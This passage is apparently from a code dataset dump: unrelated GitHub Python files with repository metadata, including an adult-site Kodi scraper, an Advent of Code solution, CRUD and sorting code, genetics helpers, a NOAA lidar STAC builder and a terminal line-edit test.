available shows.\n :return: Object of all available shows (JSON).\n \"\"\"\n page_request = self.get_object_request(category_data)\n tree = self.parser.parse(page_request.text)\n categories = [x for x in tree.xpath('.//div[@class]') if 'post-con categories' in x.attrib['class']]\n res = []\n for category in categories:\n link = category.xpath('./div[@class=\"image\"]/a')\n assert len(link) == 1\n\n image = category.xpath('./div[@class=\"image\"]/a/img')\n assert len(image) == 1\n\n title = category.xpath('./div[@class=\"title-con tk\"]/span/a')\n assert len(title) == 1\n\n object_data = PornCatalogCategoryNode(catalog_manager=self.catalog_manager,\n obj_id=link[0].attrib['href'],\n url=urljoin(self.base_url, link[0].attrib['href']),\n title=title[0].text.title(),\n image_link=image[0].attrib['src'],\n object_type=PornCategories.CATEGORY,\n super_object=category_data,\n )\n res.append(object_data)\n category_data.add_sub_objects(res)\n return res\n\n def _get_video_links_from_video_data_no_exception_check(self, video_data):\n \"\"\"\n Extracts Video link from the video page without taking care of the exceptions (being done on upper level).\n :param video_data: Video data (dict).\n :return:\n \"\"\"\n org_request = self.get_object_request(video_data)\n org_tree = self.parser.parse(org_request.text)\n tmp_url = org_tree.xpath('.//div[@class=\"video-con\"]/iframe')\n original_tmp_url = tmp_url[0].attrib['src']\n headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;'\n 'q=0.8,application/signed-exchange;v=b3*',\n 'Cache-Control': 'max-age=0',\n # 'Host': self.host_name,\n 'Sec-Fetch-Mode': 'navigate',\n 'Sec-Fetch-Site': 'same-origin',\n 'Sec-Fetch-User': '?1',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': self.user_agent\n }\n tmp_request = self.session.get(original_tmp_url, headers=headers)\n tmp_tree = self.parser.parse(tmp_request.text)\n\n videos = [VideoSource(link=x.attrib['src'], resolution=int(re.findall(r'\\d+', x.attrib['title'])[0]))\n for x in tmp_tree.xpath('.//source')]\n\n alternatives = [x for x in org_tree.xpath('.//div[@id=\"alternatives\"]/p/a') if 'Alternative' in x.text]\n for alternative in alternatives:\n tmp_url = alternative.attrib['href']\n tmp_request = self.session.get(tmp_url, headers=headers)\n tmp_tree = self.parser.parse(tmp_request.text)\n new_source = tmp_tree.xpath('.//div[@class=\"video-con\"]/iframe/@src')\n if urlparse(new_source[0]).hostname == 'verystream.com':\n # Not available anymore...\n # videos.extend([VideoSource(link=x[0], resolution=x[1])\n # for x in self.external_fetchers.get_video_link_from_verystream(new_source[0])])\n continue\n else:\n warnings.warn('Unknown source {h}...'.format(h=urlparse(new_source[0]).hostname))\n\n assert len(videos) > 0\n videos.sort(key=lambda x: x.resolution, reverse=True)\n\n headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;'\n 'q=0.8,application/signed-exchange;v=b3*',\n 'Cache-Control': 'max-age=0',\n # 'Host': self.host_name,\n 'Referer': original_tmp_url,\n 'Sec-Fetch-Mode': 'navigate',\n 'Sec-Fetch-Site': 'same-origin',\n 'Sec-Fetch-User': '?1',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': self.user_agent\n }\n\n return VideoNode(video_sources=videos, headers=headers)\n\n def _get_number_of_sub_pages(self, category_data, fetched_request=None, last_available_number_of_pages=None):\n \"\"\"\n Extracts category number of videos out of category data.\n :param fetched_request:\n :param 
category_data: Category data (dict).\n :return:\n \"\"\"\n # We perform binary search\n if category_data.object_type in (PornCategories.CATEGORY_MAIN, PornCategories.MOST_VIEWED_VIDEO):\n return 1\n else:\n return self._binary_search_max_number_of_pages(category_data, last_available_number_of_pages)\n\n def _get_available_pages_from_tree(self, tree):\n \"\"\"\n In binary looks for the available pages from current page tree.\n :param tree: Current page tree.\n :return: List of available trees\n \"\"\"\n return ([int(x) for x in tree.xpath('.//div[@class=\"donw pagination col-md-12\"]/ul/li/a/text()')\n if x.isdigit()] +\n [int(x) for x in tree.xpath('.//div[@class=\"donw pagination col-md-12\"]/ul/li/text()')\n if x.isdigit()])\n\n @property\n def _binary_search_page_threshold(self):\n \"\"\"\n Available pages threshold. 1 by default.\n \"\"\"\n return 2\n\n def get_videos_data(self, page_data):\n \"\"\"\n Gets videos data for the given category.\n :param page_data: Page data.\n :return:\n \"\"\"\n page_request = self.get_object_request(page_data)\n tree = self.parser.parse(page_request.text)\n videos = tree.xpath('.//div[@class=\"post-con\"]')\n res = []\n for video_tree_data in videos:\n if 'style' in video_tree_data.attrib:\n continue\n\n link = video_tree_data.xpath('./div[@class=\"image\"]/a')\n assert len(link) == 1\n\n image = video_tree_data.xpath('./div[@class=\"image\"]/a/img/@src')\n assert len(image) == 1\n\n title = video_tree_data.xpath('./div[@class=\"title-con\"]/span[@class=\"heading\"]/a/text()')\n assert len(title) == 1\n\n categories = video_tree_data.xpath('./div[@class=\"title-con\"]/span[@class=\"title k5\"]/span[@class=\"p5\"]/a')\n assert len(categories) > 0\n additional_data = {'categories': [(x.text.title(), x.attrib['href']) for x in categories]}\n\n date_added = video_tree_data.xpath('./div[@class=\"title-con\"]/span[@class=\"title k5\"]/h4[@class=\"dunk\"]/'\n 'text()')\n assert len(date_added) == 1\n\n video_data = PornCatalogVideoPageNode(catalog_manager=self.catalog_manager,\n obj_id=link[0].attrib['href'],\n url=urljoin(self.base_url, link[0].attrib['href']),\n title=title[0],\n image_link=image[0],\n additional_data=additional_data,\n added_before=date_added[0],\n object_type=PornCategories.VIDEO,\n super_object=page_data,\n )\n res.append(video_data)\n page_data.add_sub_objects(res)\n return res\n\n def _get_page_request_logic(self, page_data, params, page_number, true_object, page_filter, fetch_base_url):\n split_url = fetch_base_url.split('/')\n conditions = self.get_proper_filter(page_data).conditions\n true_sort_filter_id = self._default_sort_by[true_object.object_type] \\\n if true_object.object_type in self._default_sort_by \\\n else page_filter.sort_order.filter_id\n\n if (\n page_filter.period.value is not None and\n (conditions.period.sort_order is None or true_sort_filter_id in conditions.period.sort_order)\n ):\n split_url[-2] += '-' + page_filter.period.value\n\n if page_number is not None and page_number != 1:\n if len(split_url[-1]) > 0:\n split_url.append('')\n split_url.insert(-1, 'page')\n split_url.insert(-1, str(page_number))\n headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;'\n 'q=0.8,application/signed-exchange;v=b3',\n 'Cache-Control': 'max-age=0',\n 'Referer': self.base_url,\n 'Host': self.host_name,\n 'Sec-Fetch-Mode': 'navigate',\n 'Sec-Fetch-Site': 'same-origin',\n 'Sec-Fetch-User': '?1',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': self.user_agent\n }\n\n 
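# illustrative note: split_url now holds segments such as ['http:', '', 'www.porn00.org', 'categories-week', 'page', '2', ''] which join back into a paged filter URL\n        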
fetch_base_url = '/'.join(split_url)\n page_request = self.session.get(fetch_base_url, headers=headers, params=params)\n return page_request\n\n def _prepare_new_search_query(self, query):\n \"\"\"\n Searches for the wanted episode.\n :param query: Search query.\n :return: List of Video objects.\n \"\"\"\n return self.object_urls[PornCategories.SEARCH_MAIN] + '?s={q}'.format(q=quote_plus(query))\n\n @property\n def __version(self):\n return 0\n\n @property\n def _version_stack(self):\n return super(Porn00, self)._version_stack + [self.__version]\n","repo_name":"wankkodi/wank","sub_path":"plugin.video.WankWankWank/resources/lib/Fetchers/hidden/PornSites/porn00/porn00.py","file_name":"porn00.py","file_ext":"py","file_size_in_byte":12632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"20815219467","text":"\"\"\"Advent of Code 2021 day 06\"\"\"\n\nfrom collections import defaultdict\n\n\n# Part 1 - start with a naive, brute force evolution\ndef evolve(fish):\n # spawn new fish\n newfish = []\n for i in range(len(fish)):\n if fish[i] == 0:\n fish[i] = 6\n newfish.append(8)\n else:\n # decrement counters\n fish[i] -= 1\n # add newly spawned fish\n fish += newfish\n return len(fish)\n\n\n# part 2 - too many generations for naive brute force: work with counts of fish\n# per age value\ndef fishcounter(fish):\n counts = defaultdict(int)\n for i in fish:\n counts[i] += 1\n return counts\n\n\ndef evolve2(fishcounts):\n _tmp = fishcounts[0]\n for i in range(6):\n fishcounts[i] = fishcounts[i + 1]\n fishcounts[6] = _tmp + fishcounts[7]\n fishcounts[7] = fishcounts[8]\n fishcounts[8] = _tmp\n return sum(fishcounts.values())\n\n\ndef iterated_evolve(state, generations, evolver=evolve):\n for i in range(generations):\n res = evolver(state)\n return res\n\n\ndef part1(fish):\n return iterated_evolve(fish, 80)\n\n\ndef part2(fish):\n fishcounts = fishcounter(fish)\n return iterated_evolve(fishcounts, 256, evolve2)\n\n\ndef parse_input(input_fd):\n data = input_fd.readline()\n return list(map(int, data.strip().split(',')))\n\n\nif __name__ == '__main__':\n with open('input.txt') as fd:\n fish = parse_input(fd)\n\n print('Part1: ', part1(fish.copy())) # copy here so we can use `fish` in p2\n print('Part2: ', part2(fish))\n","repo_name":"MarkNOakden/AdventOfCode","sub_path":"21/06/day06.py","file_name":"day06.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"7331395319","text":"from app.schemas.driver import DriverCreate, DriverUpdate\nfrom app.models.driver import Driver\nfrom app.database.db import SessionLocal\n\n\n# Create a new driver\ndef create_driver(driver_data: DriverCreate):\n with SessionLocal() as session:\n driver = Driver(**driver_data.dict())\n session.add(driver)\n session.commit()\n session.refresh(driver)\n return driver.id\n\n\n# Get a driver by ID\ndef get_driver_details(driver_id: int):\n with SessionLocal() as session:\n driver = session.query(Driver).get(driver_id)\n if driver:\n return driver\n else:\n raise ValueError(\"Driver not found.\")\n\n\n# Update driver details\ndef update_driver(driver_id: int, driver_data: DriverUpdate):\n with SessionLocal() as session:\n driver = session.query(Driver).get(driver_id)\n if driver:\n for field, value in driver_data.dict(exclude_unset=True).items():\n setattr(driver, field, value)\n session.commit()\n else:\n raise ValueError(\"Driver not found.\")\n\n\n# Delete a driver\ndef 
delete_driver(driver_id: int):\n with SessionLocal() as session:\n driver = session.query(Driver).get(driver_id)\n if driver:\n session.delete(driver)\n session.commit()\n return driver.id\n else:\n raise ValueError(\"Driver not found.\")\n\n\n# Get all drivers\ndef get_all_drivers():\n with SessionLocal() as session:\n drivers = session.query(Driver).all()\n return drivers\n","repo_name":"Danny10ison/icard","sub_path":"app/database/crud/crud_driver.py","file_name":"crud_driver.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"31381490959","text":"'''\nITERATIVE ALLOCATION FRAMEWORK - IAF\nThis file contains the main allocation algorithm. (Algorithm description available in README)\n\nInput: List of Course objects and Student objects\nOutput: Courses allocated to students and updated in the input objects itself.\n\n'''\n\nfrom random import sample\n\nclass IAF:\n def __init__(self, courses: list, students: list):\n self.C = courses # List of Course Objects\n self.c2C = {c.code:c for c in self.C} # Map: Course Code -> Course object\n self.S = students # List of Students\n self.max_req = max([s.req for s in self.S]) # Maximum number of courses required by any student\n\n # Few Insight Variables\n self.total_allocations = 0 # Total number of allocations\n self.total_required_allocations = sum([s.req for s in self.S]) # Total number of required allocations\n \n # Private Var\n self.student_slots = {s.roll:set() for s in students} # Map: Student Roll No -> Slots allotted\n\n def run(self):\n # Main Code\n # Check README for algorithm description\n\n for req_num in range(1,self.max_req+1):\n curr_C = [c for c in self.C if c.rem > 0] # Remaining Courses\n curr_S = [s for s in self.S if s.req >= req_num] # Students who require at least 'req_num' courses\n \n while len(curr_S)>0 and len(curr_C)>0:\n self.allocate(curr_C,curr_S,req_num)\n curr_C = [c for c in curr_C if c.rem>0]\n curr_S = [s for s in curr_S if s.latest_itr1:\n if output:\n print(\"Starting Pool of multiple workers...\") \n with mp.Pool(processes = processes) as pool:\n results = pool.starmap(fun, prms)\n elif len(prms)==1:\n if output:\n print(\"Running single process...\")\n results = fun(*prms[0])\n else:\n raise RuntimeWarning(\"Nothing to run! Please check input.\")\n return results\n\ndef split_up_roh_df(base_path, path_out, iid, \n file_in=\"roh_info.csv\", file_out=\"roh_gt.csv\"):\n \"\"\"Splits up the ROH-dataframe from base_path/file_in into file_out.\n Picks out Individual iid. Done to pass on \"ground truth\"\n base_path: Where to find roh_info.csv\n path_out: Where to save roh_gt to\n iid: Which Individual to extract from roh_info.csv.\"\"\"\n #path = base_path + \"roh_info.csv\"\n path = os.path.join(base_path, file_in)\n dft = pd.read_csv(path, sep=\"\\t\") # Load the Meta File\n\n save_df = dft[dft[\"iid\"] == iid]\n save_path = os.path.join(path_out, file_out)\n save_df.to_csv(save_path, sep=\"\\t\", index=False)\n #print(f\"Saved to {save_path}\")\n return\n\ndef get_sep_from_extension(path):\n \"\"\"Get Seperator for csv/tsv from file extensions.\n Either comma or tab. 
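Raises a RuntimeError for any other extension. 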
Return delimiter\"\"\"\n ext = os.path.splitext(path)[1]\n if ext==\".tsv\":\n sep=\"\\t\"\n elif ext==\".csv\":\n sep=\",\"\n else:\n raise RuntimeError(f\"Extension {ext} of {path} invalid!\")\n return sep\n \ndef combine_individual_data(base_path, iid, delete=False, chs=range(1,23), \n prefix_out=\"\", file=\"roh.csv\", file_result=\"_roh_full.csv\"):\n \"\"\"Function to merge data from one Individual Analysis (all Chromosome)\n chs: Which Chromosomes to combine\"\n file: Which files to combine. Either roh or ibd.csv\n delete: Whether to delete individual folder and contents after combining.\"\"\"\n if isinstance(iid, (list, np.ndarray)):\n assert(len(iid)==2) # Sanity Check\n iid = \"_\".join(iid) # If multiple individual names given (for X IBD)\n full_df_vec =[] # The full dataframe of inferred ROH blocks\n \n sep = get_sep_from_extension(file) #Get right seperator\n \n ### Walk through Chromosomes and combine the Dataframes\n for ch in chs:\n path_roh = os.path.join(base_path, str(iid), \"chr\"+str(ch), prefix_out, file) \n df_temp = pd.read_csv(path_roh, sep=sep)\n full_df_vec.append(df_temp)\n \n full_df = pd.concat(full_df_vec)\n \n ### Save to Path:\n path_save = os.path.join(base_path, str(iid) + file_result)\n full_df.to_csv(path_save, index=False)\n \n ### Delete files in folder if need\n if delete == True:\n for ch in chs:\n path_folder = os.path.join(base_path, str(iid), \"chr\"+str(ch), prefix_out, \"\") \n \n for root, _, files in os.walk(path_folder):\n for file in files:\n os.remove(os.path.join(root, file))\n os.rmdir(path_folder) # Remove the Chromosome Folders\n os.rmdir(os.path.join(base_path, str(iid), \"\")) # Remove the Individual Folder\n \n return full_df\n\ndef move_X_to_parent_folder(base_path, iid, delete=False, ch=23, \n prefix_out=\"\", file_result=\"_roh_full.csv\"):\n \"\"\"Take ROH result table from X folder, and move it to parent folder. \n Delete the original result folder\"\"\"\n iid_file = str(iid[0])+\"_\"+str(iid[1])\n path_roh = os.path.join(base_path, iid_file, \"chr\"+str(ch), prefix_out, \"roh.csv\") \n path_save = os.path.join(base_path, iid_file + file_result)\n \n copyfile(path_roh, path_save) # use shutil version\n \n ### Delete files in folder if required\n if delete == True:\n path_folder = os.path.join(base_path, iid_file, \"chr\"+str(ch), prefix_out, \"\") \n\n for root, _, files in os.walk(path_folder):\n for file in files:\n os.remove(os.path.join(root, file))\n os.rmdir(path_folder) # Remove the Chromosome Folders\n os.rmdir(os.path.join(base_path, iid_file, \"\")) # Remove the Individual Folder\n\n######################################################\n### For running bcftools & plink\n\ndef create_folders(input_base_folder, outfolder=\"plink_out/\"):\n \"\"\"Create Folders for ROH analysis with Plink/BCFTOOLs.\n Operates within HAPSBURG Mosaic Data Structure. 
Return\n h5 path, vcf path, and folder for intermediary output\"\"\"\n input_h5 = os.path.join(input_base_folder, \"data.h5\")\n input_vcf = os.path.join(input_base_folder, \"data.vcf\")\n \n if not os.path.exists(input_h5):\n raise RuntimeError(f\"Create .vcf file: {input_h5}\")\n \n plink_folder = os.path.join(input_base_folder, outfolder)\n if not os.path.exists(plink_folder):\n print(f\"Creating Folder for: {plink_folder}\")\n os.makedirs(plink_folder)\n \n return input_h5, input_vcf, plink_folder\n\ndef split_up_inferred_roh(df_t, iid, save_path):\n \"\"\"Extract only ROH from Individual iid and saves it to save_path\"\"\"\n df_iid = df_t[df_t[\"iid\"]==iid]\n df_iid.to_csv(save_path, index=False)\n \ndef postprocess_iid(df_plink, input_base_folder, iids, ch=3, prefix_out=\"\"):\n \"\"\"Split up results into roh.csv and roh_gt.csv for each IID.\n df_plink: Data Frame with Plink results, formated correctly\"\"\"\n\n for iid in iids:\n output_base_folder = os.path.join(input_base_folder, \"output/\")\n path_out = prepare_path(output_base_folder, iid, ch, prefix_out=prefix_out, logfile=False)\n\n path_inferred = os.path.join(path_out, \"roh.csv\")\n split_up_inferred_roh(df_plink, iid, save_path=path_inferred) # Split up Inferred ROH\n split_up_roh_df(input_base_folder, path_out, iid) # Split up Ground Truth ROH","repo_name":"hringbauer/hapROH","sub_path":"package/hapsburg/PackagesSupport/parallel_runs/helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":7006,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"79"} +{"seq_id":"33547745025","text":"def quickSortPivotFirstElement(array):\n quickSortRecPivotFirstElement(array, 0, len(array)-1)\n return array\n\n# quickSort recursive call\ndef quickSortRecPivotFirstElement(array, startIdx, endIdx):\n # base case: contain a singe element\n if startIdx >= endIdx:\n return\n \n # 1. pick the first element as a pivot\n pivotIdx = startIdx\n leftIdx = startIdx + 1\n rightIdx = endIdx\n # 2. rearrange the array\n # 2.1 move elements smaller than the pivot to the left. Otherwise, move to the right\n while leftIdx <= rightIdx:\n if array[leftIdx] > array[pivotIdx] and array[pivotIdx] > array[rightIdx]:\n swap(leftIdx, rightIdx, array)\n # equal sign for duplicate numbers\n if array[leftIdx] <= array[pivotIdx]:\n leftIdx += 1\n if array[pivotIdx] <= array[rightIdx]:\n rightIdx -= 1\n \n # 2.2 place the pivot at the current position in the sorted array\n swap(pivotIdx, rightIdx, array) \n\n # current array status: left subarray | pivot(rightIdx) | right subarray\n # 3. 
partition\n quickSortRecPivotFirstElement(array, startIdx, rightIdx - 1)\n quickSortRecPivotFirstElement(array, rightIdx + 1, endIdx)\n\ndef swap(i, j, array):\n array[i], array[j] = array[j], array[i]\n\n\nif __name__ == \"__main__\":\n array = [8, 5, 2, 4, 11, 9, 22]\n print(\"pick the 1st element as a pivot\", quickSortPivotFirstElement(array))\n\n\"\"\"\noutput: ('pick the 1st element as a pivot', [2, 4, 5, 8, 9, 11, 22])\n\"\"\"","repo_name":"ClaireLee22/QuickSort-algorithm","sub_path":"quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36392707800","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport pyrebase\n\ndef initDatabase(db):\n current = []\n voltage = []\n\n try:\n voltage_db = db.child(\"voltage\").get()\n current_db = db.child(\"current\").get()\n except Exception as e:\n print(e)\n return \n \n for ddp in voltage_db.each():\n voltage.append(ddp.val())\n\n for ddp in current_db.each():\n parsedCurrent = (-ddp.val() + 1.7)/10**5\n current.append(parsedCurrent)\n \n data = {'Voltage': voltage, 'Current': current}\n return data\n\ndef exportCSV(data):\n csvFile = pd.DataFrame(data, columns=['Voltage', 'Current'])\n csvFile.to_csv('export_dataframe.csv', index = False, header=True)\n\n print('Os dados foram exportados com sucesso!')\n return\n\ndef getVoltametricGraph(data):\n plt.title('Voltametria cíclica')\n plt.xlabel('Tensão (Volt)')\n plt.ylabel('Corrente (Amper)')\n plt.scatter(data['Voltage'], data['Current'])\n plt.savefig('voltametricData.png', format='png')\n plt.show()\n\n print('Você poderá ver o gráfico no mesmo diretório que rodou a aplicação')\n return\n\ndef startNewMeasurement(db):\n db.child('measurement').update({'measurement': True })\n return\n\ndef endMeasurement(db):\n db.child('measurement').update({'measurement': False })\n return\n\nif __name__ == '__main__':\n print('Sistema de análise e Medição de sal na água')\n #inicializando Firebase\n firebaseConfig={\n \"apiKey\": \"your api key\",\n \"authDomain\": \"your authDomain\",\n \"databaseURL\": \"your database\",\n \"projectId\": \"your project id\",\n \"storageBucket\": \"storageBucket\",\n \"messagingSenderId\": \"messagingSenderId\",\n \"appId\": \"appId\",\n \"measurementId\": \"measurementId\"\n }\n\n firebase = pyrebase.initialize_app(firebaseConfig)\n db = firebase.database()\n\n database = initDatabase(db)\n\n while True:\n option = input('''\n Digite as informações desejadas: \n [1] - exportar arquivo csv\n [2] - ver o gráfico da voltametria cíclica\n [3] - inicializar uma nova medição\n [4] - encerrar a medição\n [5] - sair da aplicação\n ''')\n \n if option == '1':\n exportCSV(database)\n elif option == '2':\n getVoltametricGraph(database)\n elif option == '3':\n startNewMeasurement(db)\n elif option == '4':\n endMeasurement(db)\n elif option == '5':\n print('Voce saiu da aplicação')\n break","repo_name":"gustavoeraldo/water-analysis-system","sub_path":"interface/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"17794034499","text":"import json\nimport pyproj\nimport datetime\nimport xml.etree.ElementTree as ET\n\nfrom os import path, makedirs\nfrom urllib import request\nfrom typing import List\n\nfrom pystac import ItemCollection, Item, Link, Asset, Catalog, CatalogType, RelType\nfrom 
pystac.extensions.pointcloud import PointcloudExtension, Schema\nfrom pystac.extensions.projection import ProjectionExtension\n\nfrom shapely.ops import transform\nfrom shapely.geometry import shape, mapping\n\ndef get_json_info(href: str):\n    try:\n        contents = request.urlopen(href).read()\n    except Exception:\n        return {}\n    json_info = json.loads(contents)\n    return json_info\n\ndef parse_metadata(href: str):\n    metadata_info = {}\n    metadata_path = path.join(href, 'inport-xml')\n    try:\n        contents = request.urlopen(metadata_path).read()\n    except Exception:\n        return metadata_info\n    parsed = ET.fromstring(contents)\n\n    # Get data description\n    description = parsed.find('item-identification').find('abstract').text\n    if description:\n        metadata_info['description'] = description\n\n    # Find dates. Start with start and end dates if range, start date if discrete\n    # If those don't exist, get publication date. If that doesn't exist, return nothing\n    # and we'll attempt dates from the feature data\n    extents = parsed.find('extents').find('extent')\n    try:\n        dates = extents.find('time-frames').find('time-frame')\n        date_type = dates.find('time-frame-type').text\n        if date_type == 'Range':\n            metadata_info['start_date'] = dates.find('start-date-time').text\n            metadata_info['end_date'] = dates.find('end-date-time').text\n        elif date_type == 'Discrete':\n            metadata_info['date'] = dates.find('start-date-time').text\n    except AttributeError:\n        if parsed.find('item-identification').find('publication-date'):\n            metadata_info['date'] = parsed.find('item-identification').find('publication-date').text\n\n    # Get support links. If there are no contact links, return nothing.\n    support_roles = parsed.find('support-roles')\n    if support_roles:\n        metadata_info['support_roles'] = []\n        for sr in support_roles:\n            try:\n                metadata_info['support_roles'].append(\n                    {\n                        'href': sr.find('contact-url').text,\n                        'title': sr.find('support-role-type').text,\n                        'name': sr.find('contact-name').text\n                    }\n                )\n            except AttributeError:\n                pass\n\n    return metadata_info\n\ndef make_datetime(date_string: str) -> datetime.datetime:\n    if len(date_string) == 4:\n        return datetime.datetime.strptime(date_string, '%Y')\n    elif len(date_string) == 7:\n        return datetime.datetime.strptime(date_string, '%Y-%m')\n    else:\n        return datetime.datetime.strptime(date_string, '%Y-%m-%d')\n\ndef make_datetime_str(date_string) -> str:\n    return make_datetime(date_string).isoformat() + \"Z\"\n\n\ndef process_one(\n    feature: dict,\n    src_crs: pyproj.CRS,\n    dst_crs: pyproj.CRS,\n    trn: pyproj.Transformer) -> Item:\n    properties = feature['properties']\n    name = properties['Name']\n\n    src_geometry = feature['geometry']\n    s = shape(src_geometry)\n    src_bbox = list(s.bounds)\n\n    item_bbox = trn.transform_bounds(*src_bbox)\n    item_geometry = mapping(transform(trn.transform, s))\n\n    metadata_link = properties['Metalink']\n    metadata = parse_metadata(metadata_link)\n    item_properties = { 'description': metadata.get('description', '') }\n\n    # If start and end date are available, use them. 
If not go to discrete date.\n    # If that's not there, use the date provided in the feature properties.\n    if 'start_date' in metadata and 'end_date' in metadata:\n        item_properties['end_datetime'] = make_datetime_str(metadata['end_date'])\n        item_properties['start_datetime'] = make_datetime_str(metadata['start_date'])\n        item_date = None\n    elif 'date' in metadata:\n        item_date = make_datetime(metadata['date'])\n    else:\n        item_year = properties['Year']\n        if item_year != 0:\n            item_date = make_datetime(str(item_year))\n        if item_year == 0:\n            item_date = datetime.datetime.now()\n\n    extra_links = properties['ExternalProviderLink']['links']\n    ept_data = {}\n\n    # Look for data links\n    for link in extra_links:\n        # skip invalid links\n        if 'label' not in link and 'altlabel' not in link:\n            continue\n        if 'link' not in link:\n            continue\n\n        # Grab EPT data if it's available (use .get() since only one of the two keys may be present)\n        if link.get('label') == 'EPT NOAA' or link.get('altlabel') == 'Entwine Point Tile JSON file':\n            ept_link = link['link']\n            ept_data = get_json_info(ept_link)\n\n\n    if not ept_data:\n        return { }\n\n    # construct initial item\n    item = Item(\n        id=name,\n        geometry=item_geometry,\n        bbox=item_bbox,\n        datetime=item_date,\n        properties=item_properties\n    )\n\n    # Create pointcloud extension and required keys\n    item_point_count = ept_data['points']\n    ept_schema = ept_data['schema']\n    item_schema = []\n    for d in ept_schema:\n        # change 'float' to 'floating' to fit pointcloud stac schema\n        if d['type'] == 'float':\n            d['type'] = 'floating'\n        item_schema.append(Schema(d))\n\n    PointcloudExtension.ext(item, add_if_missing=True).apply(\n        encoding='ept',\n        count=item_point_count,\n        type='lidar',\n        schemas=item_schema\n    )\n\n    # Create projection extension and required keys\n    epsg = src_crs.to_epsg()\n    ProjectionExtension.ext(item, add_if_missing=True).apply(\n        epsg = epsg,\n        geometry = src_geometry,\n        projjson = src_crs.to_json_dict(),\n        wkt2 = src_crs.to_wkt(),\n        bbox = src_bbox,\n    )\n    asset = Asset(\n        href=ept_link,\n        title='EPT',\n        media_type='application/json',\n        roles=['data']\n    )\n    if 'support_roles' in metadata:\n        for link in metadata['support_roles']:\n            l = Link(rel=link['title'], target=link['href'], title=link['name'])\n            item.add_link(l)\n    item.add_asset('ept', asset)\n    return item\n\n\ndef noaa_info(output_dir: str) -> ItemCollection:\n    noaa_url = f'https://noaa-nos-coastal-lidar-pds.s3.us-east-1.amazonaws.com/laz/dav.json'\n\n    resources = get_json_info(noaa_url)\n    src_crs = pyproj.CRS.from_user_input(resources['crs']['properties']['name'])\n    dst_crs = pyproj.CRS.from_epsg(4326)\n    trn = pyproj.Transformer.from_crs(src_crs, dst_crs, always_xy=True)\n\n    item_list: List[Item] = [ ]\n    catalog = Catalog(id = 'NOAA STAC', description='NOAA STAC Catalog of Lidar Items', catalog_type=CatalogType.SELF_CONTAINED)\n    catalog.set_self_href(path.join(output_dir, 'catalog.json'))\n\n    features = resources['features']\n    full_count = len(features)\n\n    for index, feature in enumerate(features):\n        data_type = feature['properties']['DataType']\n        name = feature['properties']['Name'].replace(\"/\", \"_\")\n        # Only currently handling lidar data type\n        item = { }\n        if data_type == 'Lidar':\n            item = process_one(feature, src_crs, dst_crs, trn)\n        else:\n            continue\n\n        if item:\n            try:\n                item.validate()\n                item_list.append(item)\n\n                output_path = path.join(output_dir, f'{name}.json')\n                item_href = f'{name}.json'\n                item.set_self_href(item_href)\n                item_link = Link(rel=RelType.ITEM, target=item_href)\n                catalog.add_link(item_link)\n\n                # Write out Item\n                with open(output_path, 'w') as output_file:\n                    
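# dump the validated STAC item as pretty-printed JSON\n                    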
output_file.write(json.dumps(item.to_dict(), indent=2))\n except Exception as e:\n error_path = path.join(output_dir, 'errors')\n if not path.exists(error_path):\n makedirs(error_path)\n error_file = path.join(error_path, name)\n with open(error_file, 'w') as error_out:\n error_out.write(str(e))\n print(f'{index}/{full_count} done.')\n\n # Write out catalog\n catalog_path = path.join(output_dir, 'catalog.json')\n with open(catalog_path, 'w') as cat_file:\n cat_file.write(json.dumps(catalog.to_dict(), indent=2))\n\n # Write out item collection\n item_collection_path = path.join(output_dir, 'noaa_item_collection.json')\n ic = ItemCollection(item_list)\n with open(item_collection_path, 'w') as ic_file:\n ic_file.write(json.dumps(ic.to_dict(), indent=2))\n\n\ndef main():\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--stac_directory\", default=\"noaa_stac\", type=str, help=\"Directory to put stac catalog\")\n\n args = parser.parse_args()\n\n print(f\"Writing out to {args.stac_directory}\")\n\n if not path.exists(args.stac_directory):\n makedirs(args.stac_directory)\n\n noaa_info(args.stac_directory)\n\nmain()\n","repo_name":"hobuinc/usgs-lidar","sub_path":"action/usgs_boundary/noaa.py","file_name":"noaa.py","file_ext":"py","file_size_in_byte":9019,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"7"} +{"seq_id":"36522578361","text":"from . import BaseTest\n\n\nclass TestTUI(BaseTest):\n\n def test_line_edit(self):\n from kittens.tui.line_edit import LineEdit\n le = LineEdit()\n le.on_text('abcd', False)\n self.ae(le.cursor_pos, 4)\n for i in range(5):\n self.assertTrue(le.left()) if i < 4 else self.assertFalse(le.left())\n self.ae(le.cursor_pos, max(0, 3 - i))\n self.ae(le.pending_bell, True)\n le.clear()\n le.on_text('abcd', False), le.home()\n self.ae(le.cursor_pos, 0)\n for i in range(5):\n self.assertTrue(le.right()) if i < 4 else self.assertFalse(le.right())\n self.ae(le.cursor_pos, min(4, i + 1))\n self.ae(le.pending_bell, True)\n le.clear()\n le.on_text('abcd', False)\n self.ae(le.current_input, 'abcd')\n self.ae(le.cursor_pos, 4)\n self.ae(le.split_at_cursor(), ('abcd', ''))\n le.backspace()\n self.ae(le.current_input, 'abc')\n self.ae(le.cursor_pos, 3)\n self.assertFalse(le.pending_bell)\n le.backspace(num=2)\n self.ae(le.current_input, 'a')\n 